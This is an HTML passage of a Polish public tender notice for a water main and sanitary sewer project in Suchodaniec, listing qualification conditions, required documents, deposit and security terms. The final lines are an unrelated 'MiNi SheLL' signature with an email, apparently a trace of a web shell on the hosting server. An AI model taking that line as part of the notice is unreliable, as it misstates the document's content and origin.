<span class="normal">2) OKRES RĘKOJMI ZA WADY I GWARANCJI JAKOŚCI NA CAŁY ZAKRES ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu, określone w ogłoszeniu o zamówieniu oraz niniejszej specyfikacji warunków zamówienia.<br/>2. Warunki udziału w postępowaniu dotyczą:<br/> 1) zdolności do występowania w obrocie gospodarczym:<br/> -zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/> - zamawiający nie wyznacza szczegółowego warunku w tym zakresie:<br/>3) sytuacji ekonomicznej lub finansowej: - Wymagane jest posiadanie przez wykonawcę odpowiedniego ubezpieczenia od odpowiedzialności cywilnej na kwotę, nie mniejszą niż 9.000 000,00 zł (słownie: dziewięć milionów zł) . Załączyć dokument potwierdzający opłacenie.<br/>4) zdolności technicznej lub zawodowej:<br/>- Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie ( 2 ) roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia tj.:<br/>•	jedną (1) robotę budowlaną polegającą na rozbudowie lub budowie sieci wodociągowej o długości nie mniejszej niż 1 km<br/>•	jedną (1) robotę polegającą na budowie kanalizacji sanitarnej o długości nie mniejszej niż 4,5 km<br/><br/> - Wykonawca winien dysponować lub będzie dysponował osobami niezbędnymi do wykonania niniejszego zamówienia, tj. co najmniej:<br/><br/><br/>•	jedną (1) osobę posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami bez ograniczeń do pełnienia funkcji kierownika robót budowlanych, będącą czynnym członkiem odpowiedniej izby samorządu zawodowego,<br/>•	jedną (1) osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności drogowej bez ograniczeń, będącą czynnym członkiem odpowiedniej izby samorządu zawodowego,<br/>•	jedną (1) osobę posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami bez ograniczeń do pełnienia funkcji kierownika robót budowlanych, będącą czynnym członkiem odpowiedniej izby samorządu zawodowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie wykonawcy, w zakresie art.108 ust.1 pkt.5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ<br/>b)	Odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/> - Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej dwie ( 2 ) roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia tj.:<br/>•	jedną (1) robotę budowlaną polegającą na rozbudowie lub budowie sieci wodociągowej o długości nie mniejszej niż 1 km<br/>•	jedną (1) robotę polegającą na budowie kanalizacji sanitarnej o długości nie mniejszej niż 4,5 km<br/>załącznik nr 7 do SWZ<br/><br/>b)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>- Wykonawca winien dysponować lub będzie dysponował osobami niezbędnymi do wykonania niniejszego zamówienia, tj. co najmniej:<br/><br/>•	jedną (1) osobę posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych do kierowania robotami bez ograniczeń do pełnienia funkcji kierownika robót budowlanych, będącą czynnym członkiem odpowiedniej izby samorządu zawodowego,<br/>•	jedną (1) osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności drogowej bez ograniczeń, będącą czynnym członkiem odpowiedniej izby samorządu zawodowego,<br/>•	jedną (1) osobę posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do kierowania robotami bez ograniczeń do pełnienia funkcji kierownika robót budowlanych, będącą czynnym członkiem odpowiedniej izby samorządu zawodowego.<br/>	<br/>–	załącznik nr 8 do SWZ<br/><br/>c)	Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia nie mniejszą niż 9.000 000,00 zł (słownie: dziewięć milionów zł). Załączyć dokument potwierdzający opłacenie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1 do SWZ<br/>2) Oświadczenie wykonawcy z art.125 ust.1 ustawy Pzp (potwierdzenie spełniania warunków udziału w postępowaniu) –załącznik nr 2 do SWZ<br/>3) Oświadczenie wykonawcy z art.125 ust.1 ustawy Pzp (potwierdzenie braku podstaw wykluczenia) - załącznik nr 3 do SWZ<br/>- Oświadczenia te stanowią dowody potwierdzający spełnianie warunków udziału i brak podstaw wykluczenia w postępowaniu odpowiednio na dzień składania ofert stanowi dowód tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt 2 i 3 składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4) Zobowiązanie podmiotu udostępniającego zasoby - jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów – załącznik nr 4 do SWZ<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z własnym oświadczeniem z pkt.2 i 3 także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby (załącznik nr 5 do SWZ)<br/>5) Oświadczenie podmiotu udostępniającego – załącznik nr 5 do SWZ<br/>6) Oświadczenie wykonawcy, w zakresie art.108 ust.1 pkt.5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej – załącznik nr 6 do SWZ<br/>7) Wykaz robót budowlanych - załącznik nr 7 do SWZ<br/>8) Wykaz osób – załącznik nr 8 do SWZ<br/>9) Projekt umowy + karta gwarancyjna – załącznik nr 9 do SWZ<br/>10) Szczegółowy opis przedmiotu zamówienia – załącznik nr 10 do SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Oświadczenie wykonawcy z art.125 ust.1 ustawy Pzp (potwierdzenie spełniania warunków udziału w postępowaniu) –załącznik nr 2 do SWZ<br/>Oświadczenie wykonawcy z art.125 ust.1 ustawy Pzp (potwierdzenie braku podstaw wykluczenia) - załącznik nr 3 do SWZ<br/> Oświadczenia te stanowią dowody potwierdzający spełnianie warunków udziału i brak podstaw wykluczenia w postępowaniu odpowiednio na dzień składania ofert stanowi dowód tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt 2 i 3 składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Zobowiązanie podmiotu udostępniającego zasoby - jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów – załącznik nr 4 do SWZ<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z własnym oświadczeniem z pkt.2 i 3 także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby (załącznik nr 5 do SWZ)<br/>Oświadczenie podmiotu udostępniającego – załącznik nr 5 do SWZ<br/> Oświadczenie wykonawcy, w zakresie art.108 ust.1 pkt.5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej – załącznik nr 6 do SWZ<br/> Wykaz robót budowlanych - załącznik nr 7 do SW<br/>8) Wykaz osób – załącznik nr 8 do SWZ<br/>pełnomocnictwo <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> kosztorys <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium.<br/>2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 200 000,00 zł słownie: dwieście tysięcy zł <br/>3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:<br/>1)	w pieniądzu,<br/>2)	w gwarancjach bankowych,<br/>3)	w gwarancjach ubezpieczeniowych<br/>4)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572)<br/> 4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:<br/>bank zamawiającego BANK BS LEŚNICA O. Izbicko<br/>nr rachunku: 34 8907 1076 2006 5000 2017 0005 z adnotacją: wadium - Rozbudowa i przebudowa sieci wodociągowej oraz budowa sieci kanalizacji sanitarnej w miejscowości Suchodaniec<br/>5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>6. Wadium wniesione w pieniądzu należy złożyć z odpowiednim wyprzedzeniem, tak aby wpłynęło ono na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.<br/>8. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium w postaci elektronicznej nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do Gwaranta.<br/>9. Poręczenie, gwarancja lub inny dokument stanowiący wadium winno zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium na pierwsze pisemne żądanie Zamawiającego. Dokument ten winien obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium, określone w art. 98 ust. 6 ustawy Pzp.<br/>10. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji warunków zamówienia form wadium (niewniesienie wadium lub wniesienie w sposób nieprawidłowy) oferta wykonawcy podlegać będzie odrzuceniu.<br/>11. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>12. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy, które służyć będzie pokryciu roszczeń z tytułu niewykonania lub nienależytego umowy.<br/>2. Od wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza wymagane będzie wniesienie przed podpisaniem umowy zabezpieczenia należytego wykonania umowy w wysokości: 5 % ceny całkowitej podanej w ofercie przedstawionej przez wykonawcę <br/>3. Zabezpieczenie należytego wykonania umowy wnoszone jest w jednej lub kilku następujących formach:<br/>3.1) w pieniądzu, przelewem na rachunek bankowy:<br/>BS Leśnica oddział Izbicko 61 8907 1076 2006 5000 2017 0004<br/>z adnotacją &#34;zabezpieczenie należytego wykonania umowy - Rozbudowa i przebudowa sieci wodociągowej oraz budowa sieci kanalizacji sanitarnej w miejscowości Suchodaniec <br/>3.2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,<br/>3.3) w gwarancjach bankowych,<br/>3.4) w gwarancjach ubezpieczeniowych,<br/>3.5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/> Dopuszcza się również:<br/>3.6) w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo - kredytowej, 3.7) przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego,<br/>3.8) przez ustanowienie zastawu rejestrowego na zasadach określonych w przepisach o zastawie rejestrowym i rejestrze zastawów,<br/><br/>4. Sposób przekazania zabezpieczenia w formie innej niż pieniądz:<br/>sposób przekazania zabezpieczenia - Wykonawca przedstawi zamawiającemu potwierdzenie wniesienia zabezpieczenia najpóźniej w dniu podpisania umowy. <br/>5. Zwrot zabezpieczenia należytego wykonania umowy nastąpi w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie wykonane z zastrzeżeniem kwoty 30% wysokości zabezpieczenia, która pozostawiona zostanie na zabezpieczenie roszczeń z tytułu rękojmi za wady. Pozostawiona kwota zostanie zwrócona nie później niż 15 dni po upływie rękojmi za wady.<br/>6. Jeżeli o udzielenie zamówienia ubiegają się wykonawcy występujący wspólnie, ponoszą oni solidarną odpowiedzialność za wniesienie zabezpieczenia należytego wykonania umowy.<br/>7. Jeżeli wyłoniony wykonawca nie wniesie w określonym terminie zabezpieczenia należytego wykonania umowy zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert, bez przeprowadzania ich ponownej oceny, chyba, że zachodzi jedna z przesłanek unieważnienia postępowania.<br/>8. W zakresie zabezpieczenia należytego wykonania umowy obowiązują uregulowania Prawa zamówień publicznych zawarte w art. od 449 do 453. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> projekt umowy załącznik nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma E-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-10 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Inwestycja współfinansowana z Rządowego Funduszu Polski Ład

Creat By MiNi SheLL
Email: jattceo@gmail.com